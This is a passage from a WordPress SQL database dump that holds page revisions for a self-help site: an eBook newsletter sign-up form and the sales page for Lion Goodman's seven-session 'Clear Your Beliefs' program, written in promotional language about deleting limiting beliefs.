with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.\r\n\r\n[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:22:36', '2014-12-12 22:22:36', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2036, 2, '2014-12-12 17:23:10', '2014-12-12 22:23:10', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form; margin-left: 30px; margin-right: 30px;"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />         Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h1>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:23:10', '2014-12-12 22:23:10', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(2037, 2, '2014-12-12 17:23:55', '2014-12-12 22:23:55', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-12-12 17:23:55', '2014-12-12 22:23:55', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2038, 2, '2014-12-14 13:45:08', '2014-12-14 18:45:08', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, 